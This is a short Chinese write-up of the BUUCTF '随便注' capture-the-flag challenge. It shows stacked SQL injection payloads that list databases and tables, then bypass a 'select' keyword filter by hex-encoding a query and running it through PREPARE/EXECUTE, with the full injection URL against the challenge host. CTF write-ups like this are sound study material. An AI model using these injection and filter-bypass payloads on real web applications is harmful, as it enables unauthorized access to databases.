堆叠注入——BUUCTF-随便注

 

 

 由题目提示知道，这题需要进行sql注入

输入1'发现报错

再输入1';show batabases#出现了一大堆数据库

再输入1';show tables#出现了两个表

 

 

猜测flag在这2个表中，输入1';show create table `1919810931114514`;尝试打开表1，发现

因为select被过滤了，所以先将select * from `1919810931114514`进行16进制编码

再通过构造payload，得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn？inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag